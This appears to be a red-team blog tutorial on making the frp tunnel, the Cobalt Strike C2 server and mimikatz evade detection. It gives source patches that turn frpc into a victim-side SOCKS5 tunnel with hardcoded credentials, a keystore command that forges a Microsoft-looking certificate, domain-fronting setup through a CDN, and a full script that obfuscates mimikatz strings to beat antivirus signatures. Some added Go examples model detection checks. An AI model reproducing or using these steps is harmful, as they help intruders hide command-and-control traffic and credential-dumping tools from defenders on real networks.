Notice: the techniques, ideas and tools in this article are provided solely for security-oriented learning and exchange; if you do not agree, please close this page! Nobody may use them for illegal or profit-making purposes; anyone who does bears the consequences themselves!

image-20210709162951851

Modifying FRP

Before the modification

image-20210707150953360

When frpc.exe -c frpc_socker.ini is run on the victim machine to connect to the server, the handshake below goes out on the wire (it is readable like this only when tls_enable is off; with TLS on, the same message travels inside the TLS session).

Traffic modification

pkg\msg\msg.go

The fields shown above come from these message structs; their json tags are the names that appear on the wire.

image-20210707151346655

I added a prefix to each of them. Note that the msg package is shared by frpc and frps, so frps must be rebuilt from the same modified tree, otherwise it no longer understands the login.

image-20210708142818186

The version string is defined in pkg\util\version\version.go; it is worth changing as well.

image-20210707153734705

Change it to any other version. frps checks the version the client reports before it accepts the login, so keep the format parseable and build frps from the same tree.

image-20210708142835960

The result:

image-20210708145449323
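The following is an added example, not code from this page or from frp itself. It models the login message and frp's control-connection framing (one type byte, an int64 big-endian body length, then the JSON body) with a struct that mirrors frp's msg.Login as of the 2021 releases, and shows what a plain string signature sees before and after the tags are prefixed. The prefix x_, the version 5.1.3, the hostname and the key value are constructed for the example; with tls_enable set the body travels inside TLS and this plaintext is not visible at all.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"encoding/json"
	"fmt"
)

// Login mirrors the field layout and json tags of frp's msg.Login
// (pkg/msg/msg.go, 2021-era releases); the tags are the names that
// appear in the plaintext handshake.
type Login struct {
	Version      string            `json:"version"`
	Hostname     string            `json:"hostname"`
	Os           string            `json:"os"`
	Arch         string            `json:"arch"`
	User         string            `json:"user"`
	PrivilegeKey string            `json:"privilege_key"`
	Timestamp    int64             `json:"timestamp"`
	RunId        string            `json:"run_id"`
	Metas        map[string]string `json:"metas"`
	PoolCount    int               `json:"pool_count"`
}

// PatchedLogin is the same struct after the edit described in the text:
// every tag carries a prefix. "x_" is an arbitrary choice for this example.
type PatchedLogin struct {
	Version      string            `json:"x_version"`
	Hostname     string            `json:"x_hostname"`
	Os           string            `json:"x_os"`
	Arch         string            `json:"x_arch"`
	User         string            `json:"x_user"`
	PrivilegeKey string            `json:"x_privilege_key"`
	Timestamp    int64             `json:"x_timestamp"`
	RunId        string            `json:"x_run_id"`
	Metas        map[string]string `json:"x_metas"`
	PoolCount    int               `json:"x_pool_count"`
}

// TypeLogin is the one-byte message type frp uses for the Login message.
const TypeLogin byte = 'o'

// Frame encodes a message the way frp's msg package writes it to the
// control connection: type byte, int64 big-endian body length, JSON body.
func Frame(typ byte, v interface{}) ([]byte, error) {
	body, err := json.Marshal(v)
	if err != nil {
		return nil, err
	}
	var buf bytes.Buffer
	buf.WriteByte(typ)
	if err := binary.Write(&buf, binary.BigEndian, int64(len(body))); err != nil {
		return nil, err
	}
	buf.Write(body)
	return buf.Bytes(), nil
}

// StockIndicators are byte patterns a network signature for an unmodified
// frpc login could key on: the stock tag names and the stock version prefix.
var StockIndicators = []string{
	`"version":"0.`,
	`"privilege_key":`,
	`"run_id":`,
	`"pool_count":`,
}

// FindIndicators returns the indicators present in a framed message.
func FindIndicators(frame []byte, indicators []string) []string {
	var hits []string
	for _, ind := range indicators {
		if bytes.Contains(frame, []byte(ind)) {
			hits = append(hits, ind)
		}
	}
	return hits
}

// StockFrame builds the login a stock frpc would send (values constructed).
func StockFrame() ([]byte, error) {
	return Frame(TypeLogin, Login{
		Version: "0.37.0", Hostname: "WIN-VICTIM", Os: "windows", Arch: "amd64",
		PrivilegeKey: "d41d8cd98f00b204e9800998ecf8427e", Timestamp: 1625731200, PoolCount: 1,
	})
}

// PatchedFrame builds the same login from the patched build: renamed tags
// and an arbitrary version string, as in the text.
func PatchedFrame() ([]byte, error) {
	return Frame(TypeLogin, PatchedLogin{
		Version: "5.1.3", Hostname: "WIN-VICTIM", Os: "windows", Arch: "amd64",
		PrivilegeKey: "d41d8cd98f00b204e9800998ecf8427e", Timestamp: 1625731200, PoolCount: 1,
	})
}

func main() {
	stock, _ := StockFrame()
	patched, _ := PatchedFrame()
	fmt.Printf("stock:   type=%q len=%d hits=%v\n%s\n", stock[0], len(stock)-9, FindIndicators(stock, StockIndicators), stock[9:])
	fmt.Printf("patched: type=%q len=%d hits=%v\n%s\n", patched[0], len(patched)-9, FindIndicators(patched, StockIndicators), patched[9:])
}
```

The framing itself (type byte plus length) is untouched by the tag rename, so a signature that keys on the 'o' type byte and the JSON opening brace after an 8-byte length still fires; renaming the tags only removes the string-level indicators.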

Building

First run make, which downloads some packages from GitHub (best done through a proxy).

Then run make -f Makefile.cross-compiles to cross-compile the binaries.

image-20210708143346779

Config file modification

The whole change touches a single file: cmd/frpc/sub/root.go

First edit the var block, adding the three variables ip, port and fileContent:

var (
	cfgFile     string
	showVersion bool

	serverAddr        string
	user              string
	protocol          string
	token             string
	logLevel          string
	logFile           string
	logMaxDays        int
	disableLogColor   bool
	// added: server address and port from the command line, and the
	// generated config text
	ip                string
	port              string
	fileContent       string
	proxyName         string
	localIp           string
	localPort         int
	remotePort        int
	useEncryption     bool
	useCompression    bool
	customDomains     string
	subDomain         string
	httpUser          string
	httpPwd           string
	locations         string
	hostHeaderRewrite string
	role              string
	sk                string
	multiplexer       string
	serverName        string
	bindAddr          string
	bindPort          int

	kcpDoneCh chan struct{}
)

Then edit the flag registration:

func init() {
	rootCmd.PersistentFlags().StringVarP(&cfgFile, "config", "c", "./frpc.ini", "config file of frpc")
	rootCmd.PersistentFlags().BoolVarP(&showVersion, "version", "v", false, "version of frpc")
	// added: -t <server_addr> and -p <server_port> replace the values that
	// used to come from frpc.ini
	rootCmd.PersistentFlags().StringVarP(&ip, "server_addr", "t", "", "server_addr")
	rootCmd.PersistentFlags().StringVarP(&port, "server_port", "p", "", "server_port")
	kcpDoneCh = make(chan struct{})
}

Then add a custom function:

// getFileContent builds the frpc.ini text in memory. Only the server
// address and port come from the command line; the token and the SOCKS5
// plugin credentials are compiled into the binary as string literals.
func getFileContent(ip string, port string) {
	content := `[common]
server_addr = ` + ip + `
server_port = ` + port + `
tls_enable = true
token = china_nb

[plugin_socks5]
type = tcp
remote_port = 12345
plugin = socks5
plugin_user = admin
plugin_passwd = admin
use_encryption = true
use_compression = true
`
	fileContent = content
}

Edit the runClient function:

func runClient(cfgFilePath string, ip string, port string) (err error) {
	// the config now comes from getFileContent instead of the file on disk
	getFileContent(ip, port)
	//content, err = config.GetRenderedConfFromFile(cfgFilePath)
	content := fileContent

	cfg, err := parseClientCommonCfg(CfgFileTypeIni, content)
	if err != nil {
		return
	}

	pxyCfgs, visitorCfgs, err := config.LoadAllConfFromIni(cfg.User, content, cfg.Start)
	if err != nil {
		return err
	}

	// cfgFilePath is no longer read here; it is only passed on because
	// startService expects it
	err = startService(cfg, pxyCfgs, visitorCfgs, cfgFilePath)
	return
}

Finally, update the call in rootCmd so that runClient receives ip and port. Keep in mind that the token and the SOCKS5 username and password now sit in the binary as plaintext and can be recovered with strings; only the server address and port are supplied at run time.

var rootCmd = &cobra.Command{
	Use:   "frpc",
	Short: "frpc is the client of frp (https://github.com/fatedier/frp)",
	RunE: func(cmd *cobra.Command, args []string) error {
		if showVersion {
			fmt.Println(version.Full())
			return nil
		}
		// Do not show command usage here.
		err := runClient(cfgFile, ip, port)
		if err != nil {
			fmt.Println(err)
			os.Exit(1)
		}
		return nil
	},
}

Successful result

image-20210708165905688

Modifying Cobalt Strike

Change the default port

Edit the teamserver script and change the -Dcobaltstrike.server_port parameter (50050 by default) to 8090.

image-20210709100449609

Change the certificate characteristics

Inspect the keystore; the default password is 123456:

keytool -list -v -keystore cobaltstrike.store

image-20210709100749504

As the figure shows, the alias, owner and issuer all carry obvious cobaltstrike markers, so delete the original keystore and generate a new one with the command below. The teamserver script hands the keystore password to Java (123456 by default), so if you pick a different -storepass, change it there as well.

  • -alias: the entry alias
  • -storepass: the keystore password
  • -keypass: the password protecting the key entry
  • -keyalg: the key algorithm
  • -dname: the owner (subject) distinguished name
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias Microsoft.com -dname "CN=Microsoft e-Szigno Root CA, OU=e-Szigno CA, O=Microsoft Ltd., L=Budapest, S=HU, C=HU"

Traffic disguise

Use a profile from the Malleable-C2-Profiles project:

Usage: ./teamserver [external IP] [password] [/path/to/my.profile]

If you write your own profile, run ./c2lint [/path/to/my.profile] first to check that it is valid.

image-20210709133929402

After applying the profile the traffic looks different, but one weakness remains: our IP address is still visible here.

Domain fronting

Even after changing the traffic signatures above, our IP is still exposed, which makes it easy for the defending team to trace us back, so we can put a CDN in front. Because CDNs now verify domain ownership, domains such as ccc.github.com or ccc.apple.com can no longer be used, so this article uses a.test.com as the example domain.

First edit the Malleable C2 profile in use, setting every parameter shown in the figure below to the domain a.test.com:

image-20210709142040450

Then restart Cobalt Strike and configure the listener as shown below:

image-20210709150735281

Payloads generated from this listener then use domain fronting.
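The following is an added example, not code from this page or from Cobalt Strike, showing the mechanism the listener configuration above relies on and the check a defender can make against it. The beacon connects (DNS, TCP, TLS SNI) to the CDN edge, while the HTTP Host header names the fronted origin; the CDN routes on the Host header, so the victim only ever talks to CDN IP addresses. A sensor that can see both the SNI and the decrypted Host header flags the mismatch. The hostnames edge.cdn.example.net and the path are placeholders; a.test.com is the page's example domain; the registrable-domain check is a two-label approximation, not a public-suffix lookup.

```go
package main

import (
	"bytes"
	"fmt"
	"net/http"
	"strings"
)

// BuildFrontedRequest builds the request a fronted beacon sends. The TCP and
// TLS connection (DNS lookup, SNI) goes to edgeHost, the CDN hostname, while
// the Host header carries frontedHost, the origin the CDN actually routes to.
func BuildFrontedRequest(edgeHost, frontedHost, path string) (*http.Request, error) {
	req, err := http.NewRequest("GET", "https://"+edgeHost+path, nil)
	if err != nil {
		return nil, err
	}
	req.Host = frontedHost // net/http emits req.Host as the Host header
	return req, nil
}

// Serialize renders the request as it would be written inside the TLS
// tunnel, so the Host line can be inspected.
func Serialize(req *http.Request) (string, error) {
	var buf bytes.Buffer
	if err := req.Write(&buf); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// Observation is the pair a TLS-terminating proxy, or a sensor with
// decryption, can log for each connection.
type Observation struct {
	SNI  string // server name from the ClientHello
	Host string // Host header from the decrypted request
}

// registrable approximates the registrable domain as the last two labels.
// This is wrong for multi-label public suffixes such as co.uk; a real
// sensor would consult the public suffix list.
func registrable(name string) string {
	name = strings.ToLower(strings.TrimSuffix(name, "."))
	if i := strings.LastIndex(name, ":"); i >= 0 {
		name = name[:i] // drop a port
	}
	labels := strings.Split(name, ".")
	if len(labels) <= 2 {
		return name
	}
	return strings.Join(labels[len(labels)-2:], ".")
}

// FrontingSuspect flags a connection whose Host header does not belong to
// the same registrable domain as the SNI, the mismatch fronting relies on.
func FrontingSuspect(o Observation) bool {
	return registrable(o.SNI) != registrable(o.Host)
}

func main() {
	req, _ := BuildFrontedRequest("edge.cdn.example.net", "a.test.com", "/updates/check")
	wire, _ := Serialize(req)
	fmt.Print(wire)
	// constructed observations: one fronted connection, one ordinary one
	for _, o := range []Observation{
		{SNI: "edge.cdn.example.net", Host: "a.test.com"},
		{SNI: "edge.cdn.example.net", Host: "assets.cdn.example.net"},
	} {
		fmt.Printf("sni=%s host=%s suspect=%v\n", o.SNI, o.Host, FrontingSuspect(o))
	}
}
```

The same SNI/Host comparison is what several large CDNs now perform themselves to refuse fronted requests, which is why the page has to use a domain it controls rather than an arbitrary third-party hostname.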

Modifying mimikatz

Keyword replacement script

#!/bin/sh
# clone into ./windows: every path below assumes that directory name
git clone --depth=1 https://github.com.cnpmjs.org/gentilkiwi/mimikatz.git windows

## BASIC Strings ##

mimi=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 8 | head -n 1)
mv windows/mimikatz windows/$mimi
find windows/ -type f -print0 | xargs -0 sed -i "s/mimikatz/$mimi/g"
MIMI=$(cat /dev/urandom | tr -dc "A-Z" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/MIMIKATZ/$MIMI/g"
Mimi=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Mimikatz/$Mimi/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 5 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/DELPY/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Benjamin/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 23 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/benjamin@gentilkiwi.com/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 15 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/creativecommons/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 10 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/gentilkiwi/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 4 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/KIWI/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 4 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Kiwi/$string/g"
kiwi=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 4 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/kiwi/$kiwi/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 13 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/A La Vie, A L/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 24 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/vincent.letoux@gmail.com/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/benjamin/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 14 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Benjamin DELPY/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 5 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/oe.eo/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 14 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/pingcastle.com/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 16 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/mysmartlogon.com/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 15 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Vincent LE TOUX/$string/g"

## Basic Function Names ##

find windows/ -type f -print0 | xargs -0 sed -i "s/logonPasswords/loGoNpASSwoRdS/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/dpapi/dPApi/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sekurlsa/seKuRlSa/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sekurLSA/seKuRlSa/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ngc/nGc/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/lsadump/lsADumP/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/crypto/cRyPTO/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/kerberos/kErberoS/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/token/tOKEn/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/misc/mIsC/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/minesweeper/mInesWeEpEr/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/vault/vAULt/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/privilege/PRIViLeGe/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/process/ProCeSs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/busylight/bUsYlIght/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sr98/sR98/g"


## Sub-function Names ##

# Sekurlsa #

find windows/ -type f -print0 | xargs -0 sed -i "s/msv/mSv/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/wdigest/wDiGeST/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/tspkg/tsPkG/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/livessp/liVeSsP/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cloudap/clOuDAp/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ssp/sSp/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/logonpasswords/loGonPaSSworDs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/minidump/mIniDumP/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/bootkey/bOOtKey/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/pth/ptH/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/krbtgt/krbTgT/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/backupkeys/backUpKeyS/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/tickets/ticKets/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ekeys/eKeYs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/credman/crEdMan/g"

# Crypto #

find windows/ -type f -print0 | xargs -0 sed -i "s/providers/prOviDers/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/certificates/certIfiCatEs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/scauth/sCaUth/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/extract/exTraCt/g"

# dpapi #

find windows/ -type f -print0 | xargs -0 sed -i "s/masterkey/masTerKeY/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/credhist/crEdHiSt/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cloudapkd/clOudApKd/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cloudapreg/clOuDapReg/g"

# kerberos #

find windows/ -type f -print0 | xargs -0 sed -i "s/golden/golDen/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ptt/pTt/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/clist/cLiSt/g"

# lsadump #

find windows/ -type f -print0 | xargs -0 sed -i "s/secrets/seCrEts/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sam/saM/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/dcshadow/dCShAdoW/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/dcsync/dCsYnC/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/setntlm/seTnTlM/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/netsync/neTSynC/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cache/caCHe/g"

# misc #

find windows/ -type f -print0 | xargs -0 sed -i "s/regedit/reGeDit/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/skeleton/sKeLeToN/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/easyntlmchall/easYnTlmChaLl/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ncroutemon/nCroUTeMoN/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/taskmgr/taSkMgR/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/aadcookie/aAdcOoKiE/g"

# vault #

find windows/ -type f -print0 | xargs -0 sed -i "s/cred/crEd/g"

# token #

find windows/ -type f -print0 | xargs -0 sed -i "s/elevate/eleVatE/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/revert/reVeRt/g"


## Replace file names ##

find windows/ -type f -name "*mimikatz*" | while read FILE ; do
newfile="$(echo ${FILE} |sed -e "s/mimikatz/$mimi/g")";
mv "${FILE}" "${newfile}";
done
find windows/ -type f -name "*kiwi*" | while read FILE ; do
newfile="$(echo ${FILE} |sed -e "s/kiwi/$kiwi/g")";
mv "${FILE}" "${newfile}";
done
## ZIP File ##

zip -r mimi.zip ./windows

Then delete this string and replace it with hello word:

image-20210709155034578

Then use an icon tool to extract and replace the icon; after replacement it looks like this:

image-20210709160159713

image-20210709160237931 image-20210709160254519

Final appearance

image-20210709160356633
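The following is an added example, not code from this page or from the gist the script is based on. It models the two strategies the script above uses on a constructed source fragment: random replacement for project strings (mimikatz, gentilkiwi, the author's e-mail) and re-casing for command names (sekurlsa, logonpasswords, lsadump). Fixed strings stand in for the values the script draws from /dev/urandom, so the output is deterministic. The point it demonstrates is the caveat a practitioner should check before shipping the binary: re-casing only defeats a case-sensitive match; a YARA string with the nocase modifier, or a case-insensitive grep over the strings output, still finds every re-cased name.

```go
package main

import (
	"fmt"
	"strings"
)

// Replacement is one sed substitution from the script: literal old text and
// its replacement, applied in order to the whole tree.
type Replacement struct{ Old, New string }

// Script is a subset of the substitutions. The random values are fixed
// stand-ins for the /dev/urandom output; the re-casings are the script's own.
var Script = []Replacement{
	{"mimikatz", "qwxzrtpl"},
	{"MIMIKATZ", "QWXZRTPL"},
	{"benjamin@gentilkiwi.com", "k3nv8qd2p0xw1zsyh7lua9b"},
	{"gentilkiwi", "u7tr1pq0xe"},
	{"sekurlsa", "seKuRlSa"},
	{"logonpasswords", "loGonPaSSworDs"},
	{"lsadump", "lsADumP"},
}

// Obfuscate applies the substitutions sequentially, like the chain of
// find | xargs sed -i calls; order matters, as it does in the script.
func Obfuscate(src string, rules []Replacement) string {
	out := src
	for _, r := range rules {
		out = strings.ReplaceAll(out, r.Old, r.New)
	}
	return out
}

// Scan returns the indicators still present in data, once for a
// case-sensitive match (a plain string signature or strings | grep) and
// once for a case-insensitive one (a YARA string with the nocase modifier).
func Scan(data string, indicators []string) (sensitive, insensitive []string) {
	lower := strings.ToLower(data)
	for _, ind := range indicators {
		if strings.Contains(data, ind) {
			sensitive = append(sensitive, ind)
		}
		if strings.Contains(lower, strings.ToLower(ind)) {
			insensitive = append(insensitive, ind)
		}
	}
	return sensitive, insensitive
}

// Sample is a constructed fragment shaped like mimikatz source; it is not
// copied from the project.
const Sample = `#define MIMIKATZ L"mimikatz"
/* Benjamin DELPY <benjamin@gentilkiwi.com> - http://blog.gentilkiwi.com */
const KUHL_M kuhl_m_sekurlsa = {L"sekurlsa", L"SekurLSA module", kuhl_m_c_sekurlsa};
{kuhl_m_sekurlsa_all, L"logonpasswords", L"Lists all available providers credentials"},
{kuhl_m_lsadump_sam, L"sam", L"Get the SysKey to decrypt SAM entries"},
`

// Indicators are strings a detection rule might look for.
var Indicators = []string{"mimikatz", "gentilkiwi", "sekurlsa", "logonpasswords", "lsadump"}

func main() {
	out := Obfuscate(Sample, Script)
	s, i := Scan(out, Indicators)
	fmt.Println(out)
	fmt.Println("case-sensitive hits:  ", s)
	fmt.Println("case-insensitive hits:", i)
}
```

Against the constructed sample the randomized strings disappear under both kinds of match, while sekurlsa, logonpasswords and lsadump survive the case-insensitive one. If those names must also go, treat them like the project strings (random replacement) rather than re-casing them, and re-run a case-insensitive scan over the built binary rather than the source.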

References

https://chowdera.com/2021/03/20210311155239092N.html
https://uknowsec.cn/posts/notes/FRP%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92.html
https://choge.top/2020/08/16/Cobaltstrike%E4%B9%8B%E6%B5%81%E9%87%8F%E9%9A%90%E8%97%8F/
https://gist.githubusercontent.com/S3cur3Th1sSh1t/08623de0c5cc67d36d4a235cec0f5333/raw/dafbd32d1307c4ebb512e4eb7c43c7e1292bcac9/ObfuscateMimi_First.sh